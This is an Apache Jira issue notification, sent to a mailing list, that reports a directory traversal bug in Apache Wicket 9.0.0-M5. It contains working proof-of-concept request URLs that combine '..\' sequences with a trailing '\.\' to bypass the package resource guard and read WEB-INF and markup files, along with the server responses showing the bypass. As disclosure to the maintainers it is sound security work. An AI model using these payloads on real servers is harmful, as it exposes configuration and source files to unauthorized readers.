[jira] [Updated] (WICKET-6785) Wicket directory traversal to root package - read file out of scope

Thu, 14 May 2020 04:57:03 -0700 


     [ 
https://issues.apache.org/jira/browse/WICKET-6785?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Mariusz Popłwski updated WICKET-6785:
-------------------------------------
    Summary: Wicket directory traversal to root package - read file out of 
scope  (was: Wicket directory traversal to root package - read wicker markup 
files)

> Wicket directory traversal to root package - read file out of scope
> -------------------------------------------------------------------
>
>                 Key: WICKET-6785
>                 URL: https://issues.apache.org/jira/browse/WICKET-6785
>             Project: Wicket
>          Issue Type: Bug
>          Components: wicket-core
>    Affects Versions: 9.0.0-M5
>         Environment: Default installation of wicket from  
> https://wicket.apache.org/start/quickstart.html
> Allow to reproduce above vulnerability.
> mvn archetype:generate -DarchetypeGroupId=org.apache.wicket 
> -DarchetypeArtifactId=wicket-archetype-quickstart -DarchetypeVersion=9.0.0-M5 
> -DgroupId=com.mycompany -DartifactId=myproject 
> -DarchetypeRepository=https://repository.apache.org/ -DinteractiveMode=false
>            Reporter: Mariusz Popłwski
>            Priority: Major
>         Attachments: project_root.png, wicket-poc1.png, wicket-poc2.png, 
> wicket-poc3.png
>
>
> Unauthorized user is allowed to read files out of allowed scope by combine of 
> directory traversal and bypass of guard protection.
>  
> Security risk is medium due to next protection of guard default files 
> extension white list, in case of bypass this restriction this security 
> vulnerability may be critical, we are even allow to ask for serve 
> WEB-INF\web.xml but guard block our attempt.
>  
> User is able to escape root with use of directory traversal "..\..\" key of 
> the vulnerability is to use "\.\" current directory mark on the end of query 
> which led to bypass guard protection.
>  
> *Proof of concepts.*
>  
> Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\web.xml{code}
>  
>  
> {code:java}
> org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException:
>  Access denied to (static) package resource ././WEB-INF/web.xml. See 
> IPackageResourceGuard{code}
>  
>  
> Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\file_in_web_inf.txt{code}
>  
> Response:
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:37:34 GMT
> Last-Modified: Thu, 14 May 2020 11:36:38 GMT
> Expires: Fri, 14 May 2021 11:37:34 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/plain
> Accept-Range: bytes
> Content-Length: 4
> Server: Jetty(9.4.27.v20200227)
> 1337
> {code}
>  
> My app structure:
>  
> {code:java}
> src/
>     main/
>         java/
>             com.mycompany
>                    fileupload/
>                    FileUploadPanel.class
>                    HomePage.class
>                    HomepPage.html
>              javaroot.png
>            WicketApplication.class
>         resource/
>         webapp/
>             WEB-INF/
>                 file_in_web_inf.txt 
>                 web.xml
>     test/
> {code}
>  
>  
>  
> *Bypass file read block by guard from java/ packages dir.*
> ------------------------
>  Trying to read file "javaroot.png" from java/ folder
>  Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\javaroot.png{code}
> *Server log:*
>  
>  
> {code:java}
> [qtp1521118594-25] WARN org.apache.wicket.markup.html.PackageResourceGuard - 
> Access to root directory is by default disabled for shared resources: 
> javaroot.png[qtp1521118594-25] WARN RequestCycleExtra - 
> ********************************[qtp1521118594-25] WARN RequestCycleExtra - 
> Handling the following 
> exceptionorg.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException:
>  Access denied to (static) package resource javaroot.png. See 
> IPackageResourceGuard at 
> org.apache.wicket.request.resource.PackageResource.internalGetResourceStream(PackageResource.java:584)
>  {code}
>  
>  
> User Output:
>  
> {code:java}
> Last cause: Access denied to (static) package resource javaroot.png. See 
> IPackageResourceGuard<br/>{code}
>  
>  
> Bypass using \.:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\.\javaroot.png
> {code}
> User partial oputput:
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:09:14 GMT
> Last-Modified: Wed, 13 May 2020 18:11:09 GMT
> Expires: Fri, 14 May 2021 11:09:14 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: image/png
> Accept-Range: bytes
> Content-Length: 12244
> Server: Jetty(9.4.27.v20200227)
> ‰PNG.....
> {code}
>  
>  
>  
> *Bypass markup file read block guard*
> ------------------------
>  
> Dir traversal allowing us to get into other package but still we are 
> forbidden to preview of Wicket markup files
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\com/mycompany/HomePage.html?{code}
>  
> Error on server side:
>  
> {code:java}
> [qtp1521118594-30] WARN org.apache.wicket.markup.html.PackageResourceGuard - 
> Access denied to shared (static) resource because it is a Wicket markup file: 
> com/mycompany/HomePage.html{code}
>  
> User output
>  
> {code:java}
> :Last cause: Access denied to (static) package resource 
> com/mycompany/HomePage.html. See IPackageResourceGuard<br/>{code}
>  
> Bypass:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\com/mycompany/HomePage.html?{code}
>  
> User output:
>  
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:10:05 GMT
> Last-Modified: Thu, 14 May 2020 10:54:40 GMTExpires: Fri, 14 May 2021 
> 11:10:05 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/html
> Accept-Range: bytes
> Content-Length: 640
> Server: Jetty(9.4.27.v20200227)
> <!DOCTYPE html><html xmlns:wicket="http://wicket.apache.org";> <head> <meta 
> charset="utf-8" /> <title>Apache Wicket Quickstart</title> <link 
> href='http://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:regular,bold' 
> rel='stylesheet' type='text/css' /> <link rel="stylesheet" href="style.css" 
> type="text/css" media="screen" title="Stylesheet" /> </head> <body> <div 
> id="hd"> <div id="logo"> <img src="logo.png" width="50px" height="50px" 
> alt="Wicket Logo" /> <h1>Apache Wicket</h1> </div> </div> <div id="bd">       
>      <div wicket:id="fileUpload"></div> </div> <div id="ft"> </div> 
> </body></html>
> {code}
>  



--
This message was sent by Atlassian Jira
(v8.3.4#803005)

Reply via email to